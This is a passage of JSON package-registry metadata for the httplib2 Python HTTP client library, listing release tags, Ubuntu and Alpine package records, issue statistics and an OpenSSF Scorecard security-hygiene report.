:"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T16:25:00.772Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-23.10\u0026repository_url=https://launchpad.net/ubuntu/mantic","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.10","url":"https://launchpad.net/ubuntu/mantic","ecosystem":"ubuntu","default":false,"packages_count":36642,"maintainers_count":0,"namespaces_count":4,"keywords_count":2213,"github":"ubuntu","metadata":{"codename":"mantic","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1339},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.636Z","updated_at":"2026-08-25T05:06:51.033Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/namespaces"}},{"id":8676979,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_number":"0.22.0-r1","last_synced_at":"2026-03-10T13:08:45.258Z","created_at":"2023-12-20T10:27:50.929Z","updated_at":"2026-08-21T16:25:00.868Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"